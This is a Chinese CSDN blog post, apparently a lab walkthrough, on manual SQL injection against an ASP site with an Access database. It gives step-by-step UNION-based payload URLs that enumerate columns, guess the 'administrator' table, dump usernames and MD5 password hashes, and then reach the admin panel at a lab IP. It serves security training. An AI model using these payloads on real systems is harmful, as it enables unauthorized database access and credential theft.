ACCESS手工注入

于 2024-08-20 12:55:07 发布
阅读量322 收藏 3
点赞数 7
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shw_yzh/article/details/141354119
版权

http://t.csdnimg.cn/l6Hvp  ACCESS环境搭建查看此文章

1.打开网页查看是否存在注入

/news_view.asp?id=13' //报错

/news_view.asp?id=13 and 1=1  //页面正常

/news_view.asp?id=13 and 1=2  //页面错误

2.order by 查看字段列数

/news_view.asp?id=13 order by 8  //页面错误

/news_view.asp?id=13 order by 7  //页面正常,说明有七列

3.判断回显字段及猜测表名称

/news_view.asp?id=13 union select 1,2,3,4,5,6,7 from admin  //页面错误,说明表名不是admin

/news_view.asp?id=13 union select 1,2,3,4,5,6,7 from administrator  //页面正常,且出现回显点

4.猜用户名和密码

/news_view.asp?id=13 union select 1,user_name,password,4,5,6,7 from administrator  //页面正常,说明存在用户名为user_name,密码字段为password

5.将获取到的密码通过MD5解密

6.通过御剑扫描ip下的目录,查找后台登陆系统

访问http://172.16.1.52/admin/index.asp  ,登录后台

2407-2 shw
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
SQL注入Access注入手工
12-14
什么是SQL注入SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现...
手工注入基础
11-11
手工注入是一种针对Web应用程序的安全漏洞利用技术,通常发生在应用程序未能充分验证或转义用户输入的情况。这种漏洞允许攻击者通过构造特定的输入来执行数据库查询,获取敏感信息,甚至控制服务器。以下是对手工...
ASP手工注入
08-08
进行手工注入前,首先需了解目标网站所使用的数据库类型,常见的有Microsoft AccessSQL Server、Oracle等。不同数据库系统有着不同的语法特点和响应机制,这直接影响了注入语句的设计与执行效果。 #### 2. 数据库...
SQL FOREIGN KEY 约束
m0_50736744的博客
08-16 415
SQL FOREIGN KEY 约束一个表中的 FOREIGN KEY 指向另一个表中的 UNIQUE KEY(唯一约束的键)。
SQL,将多对多的关联记录按行输出
smilejingwei的博客
08-19 143
要求从两张表中找出符合条件W=100,H=500,D=300的记录,先输出Primay里的一行,再输出相关联的Secondary的每一行。A3:A2为空时返回空,A2不为空时,循环A1的每条记录 ~,合并 ~ 和 A2,最后再合并循环的结果。数据库的Primary表和Secondary表有相同的结构,其中W、H、D是主键。A1、A2:执行简单SQL,条件查询。
SQL - 基础大汇总
心如冰清,天塌不惊
08-16 450
【代码】数据库 - 基础。
SQL - 多表查询
心如冰清,天塌不惊
08-18 392
【代码】SQL - 多表查询。
SQL的连接查询与pandas的对应关系
C'mon的博客
08-16 719
SQL和Pandas中,连接查询(join)是处理数据集之间关系的重要工具。
浅谈SQL Server、Oracle和MySQL
a876106354的博客
08-15 775
SQL Server 是Microsoft公司推出的关系型数据库管理系统。具有使用方便可伸缩性好与相关软件集成程度高等优点,可跨越从运行MicrosoftWindows 98的膝上型电脑到运行2012 的大型多处理器的服务器等多种平台使用。Microsoft SQL Server 是一个全面的数据库平台,使用集成的商业智能(BI)工具提供了企业级的数据管理。数据库引擎为关系型数据和结构化数据提供了更安全可靠的存储功能,使您可以构建和管理用于业务的高可用和高性能的数据应用程序。MySQL是一个。
SQLALchemy 数据的 CRUD 操作
CSDN全栈领域优秀博主,阿里云博客专家,工信部权威认证物联网技术开发工程师,曾30分钟高分通过C语言二级,两天手撸代码完成EasyX飞机大战,靠接软件私活一个月换苹果电脑
08-15 326
SQLAlchemy 是一个流行的 SQL 工具包和对象关系映射(ORM)库,用于 Python。它提供了一个高级接口来与数据库交互,允许开发者通过 Python 对象来执行 CRUD(创建、读取、更新、删除)操作,而无需编写大量的 SQL 语句。
鸿萌数据恢复服务:SQL Server 中的 GAM、SGAM、IAM,及数据库损坏的修复方法
sanyuan7783的博客
08-16 967
全局分配映射 (GAM) 负责处理数据库内的分配区,有助于在需要时识别空闲区。共享分配映射 (SGAM) 页类似于粒度图,处理数据库中特定文件组的扩展分配。索引分配映射 (IAM) 页是特殊的内部页,其作用类似于数据存储的注册表,跟踪数据页在数据库文件中的位置。
HiveSQL\SparkSQL的json高性能解析方案
weixin_43451620的博客
08-16 329
Hive\Spark高性能解析json字符串
RazorSQL for Mac/Win:强大的跨平台多功能SQL数据库编辑器RazorSQL for Mac/Win:功能强大的跨平台 SQL 数据库编辑器
2401_82627223的博客
08-17 419
RazorSQL 是一款功能全面、性能卓越的 SQL 数据库编辑器,无论是专业的数据库开发人员,还是数据库管理的初学者,都能从中受益,是您处理数据库相关工作的得力助手。
SQL-约束篇
最新发布
Broken_x的博客
08-19 484
SQL约束是数据库设计中不可或缺的一部分,通过合理使用各种约束,可以确保数据的完整性和一致性。在实际应用中,开发者应根据需求灵活运用这些约束,以提高数据管理的效率和安全性。
SQL - 设计数据库
心如冰清,天塌不惊
08-18 238
注意。
[高频sql50ti]第1484题,按日期分组销售产品
weixin_45201305的博客
08-19 337
5. 长度限制:`GROUP_CONCAT()`的结果长度受限于系统变量`group_concat_max_len`,默认值为1024字节。对于2020-05-30,出售的物品是 (Headphone, Basketball, T-shirt),按词典序排列,并用逗号 ',' 分隔。对于2020-06-01,出售的物品是 (Pencil, Bible),按词典序排列,并用逗号分隔。- SEPARATOR:可选,用于指定连接字符串的分隔符,默认为逗号`,`。- DISTINCT:可选,用于去除重复值。
《Linux运维实战:达梦DM8数据库(联机)物理备份之SQL方式归档备份与恢复》
东城绝神
08-14 525
《Linux运维实战:达梦DM8数据库(联机)物理备份之SQL方式归档备份与恢复》
SQLALchemy 自动从数据库中映射
CSDN全栈领域优秀博主,阿里云博客专家,工信部权威认证物联网技术开发工程师,曾30分钟高分通过C语言二级,两天手撸代码完成EasyX飞机大战,靠接软件私活一个月换苹果电脑
08-15 406
SQLAlchemy中,自动从数据库中映射表到Python类(也称为“反射”或“逆向工程”)是一个常见的需求,尤其是在你已经有了一个现有的数据库,并希望快速地为它创建一个ORM模型时。SQLAlchemy提供了工具来帮助你完成这个任务,但需要注意的是,这个过程通常是半自动的,因为SQLAlchemy需要一些指导来正确地映射表之间的关系和列的数据类型。:首先,你需要使用SQLAlchemy的函数来创建一个数据库引擎,该引擎将用于与你的数据库进行通信。:使用MetaData对象和Table对象的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值